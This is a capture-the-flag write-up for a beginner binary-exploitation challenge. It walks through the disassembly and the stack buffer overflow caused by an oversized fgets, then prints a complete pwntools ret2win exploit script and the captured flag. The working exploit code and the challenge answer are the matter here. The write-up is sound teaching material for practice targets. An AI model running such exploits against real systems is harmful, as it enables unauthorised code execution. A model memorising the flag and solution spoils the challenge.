Description
Welcome to the series of 3 pwn challenges!
nc challs.n00bzunit3d.xyz 35932
Attachment: pwn1
Solving
First we disassemble the binary to locate the buffer overflow and work out the offset from the start of the buffer to the saved return address.
objdump -D pwn1
00000000004011fb <main>:
4011fb: f3 0f 1e fa endbr64
4011ff: 55 push %rbp
401200: 48 89 e5 mov %rsp,%rbp
401203: 48 83 ec 40 sub $0x40,%rsp
401207: b8 00 00 00 00 mov $0x0,%eax
40120c: e8 85 ff ff ff call 401196 <init>
401211: 48 8d 05 ec 0d 00 00 lea 0xdec(%rip),%rax # 402004 <_IO_stdin_used+0x4>
401218: 48 89 c7 mov %rax,%rdi
40121b: e8 50 fe ff ff call 401070 <puts@plt>
401220: 48 8b 15 49 2e 00 00 mov 0x2e49(%rip),%rdx # 404070 <stdin@GLIBC_2.2.5>
401227: 48 8d 45 c0 lea -0x40(%rbp),%rax
40122b: be 50 00 00 00 mov $0x50,%esi
401230: 48 89 c7 mov %rax,%rdi
401233: e8 58 fe ff ff call 401090 <fgets@plt>
401238: 48 8d 05 dc 0d 00 00 lea 0xddc(%rip),%rax # 40201b <_IO_stdin_used+0x1b>
40123f: 48 89 c7 mov %rax,%rdi
401242: e8 39 fe ff ff call 401080 <system@plt>
401247: 90 nop
401248: c9 leave
401249: c3 ret
000000000040124a <win>:
40124a: f3 0f 1e fa endbr64
40124e: 55 push %rbp
40124f: 48 89 e5 mov %rsp,%rbp
401252: 57 push %rdi
401253: 48 8d 05 d3 0d 00 00 lea 0xdd3(%rip),%rax # 40202d <_IO_stdin_used+0x2d>
40125a: 48 89 c7 mov %rax,%rdi
40125d: e8 1e fe ff ff call 401080 <system@plt>
401262: 90 nop
401263: 5d pop %rbp
401264: c3 ret
The disassembly shows a `win` function that `main` never calls: it just passes the string at `0x40202d` to `system()`. In `main`, the stack buffer sits at `rbp-0x40` (64 bytes), yet `fgets` is told it may store up to `0x50` (80) bytes, so a long line overwrites the saved `rbp` and then the return address. The offset to the return address is therefore 64 bytes of buffer + 8 bytes of saved `rbp` = 72. Two details make the simple ret2win work here: the fixed `0x40xxxx` addresses indicate a non-PIE binary, so `win`'s address is known without a leak; and because `fgets(buf, 0x50, ...)` stores at most 79 input bytes followed by a NUL, the 80th byte of the payload (the most-significant byte of the 8-byte address) is actually written by that terminator — which is fine only because the address `0x000000000040124a` has a zero high byte.
#!/usr/bin/env python3
from pwn import *
# Challenge binary; registering it as context.binary makes it pwntools' default
# target (p64() below packs for it, and start() runs it).
exe = './pwn1'
context.binary = ELF(exe)
elf = context.binary
# Terminal used by gdb.debug() when the script is launched with the GDB flag.
context.terminal = ['alacritty', '-e', 'zsh', '-c']
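def start(argv=None, *a, **kw):
    """Launch the target and return a pwntools tube.

    The backend is chosen from pwntools' command-line ``args``:
    ``GDB`` runs the binary under gdb with ``gdbscript``; ``REMOTE`` connects
    to ``sys.argv[1]:sys.argv[2]`` (``sys`` comes from ``from pwn import *``,
    which re-exports it); otherwise the binary at ``exe`` is run locally.

    Args:
        argv: extra command-line arguments for the target; ``None`` means none.
            A fresh list is built per call (the previous ``argv=[]`` default was
            a shared mutable object).
        *a, **kw: passed through to ``gdb.debug`` / ``remote`` / ``process``.

    Returns:
        The tube returned by the selected pwntools backend.
    """
    argv = [] if argv is None else list(argv)
    if args.GDB:  # gdbscript is the module-level GDB command string
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:  # usage: python3 exploit.py REMOTE <host> <port>
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe] + argv, *a, **kw)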
# Commands fed to GDB when the script is run with the GDB flag; empty for now.
# .format(**locals()) is kept so names such as {exe} can be interpolated later.
gdbscript = "\n".format(**locals())
#### Exploit starts here ####
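io = start()

# Frame layout of main() from the disassembly: the buffer is at rbp-0x40, so
# 64 bytes of buffer + 8 bytes of saved rbp = 72 bytes before the return address.
offset = 72

# Overwrite the return address with win, which calls system() for us.
win_addr = elf.symbols['win']
payload = b'A' * offset + p64(win_addr)

# fgets(buf, 0x50, stdin) stores at most 0x4f input bytes and then a NUL, so only
# the first 79 bytes of this 80-byte payload are copied; the 80th byte (the top
# byte of the return address) is fgets' own terminator. That is correct only
# because win's non-PIE address has a zero high byte -- check it instead of
# relying on it silently. The newline sendline() appends is never stored.
if len(payload) > 0x50 or any(payload[0x4f:]):
    raise ValueError("payload bytes past fgets' 0x4f-byte limit would be dropped or zeroed")

io.sendline(payload)
io.interactive()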
Result
n00bz{PWN_1_Cl34r3d_n0w_0nt0_PWN_2!!!}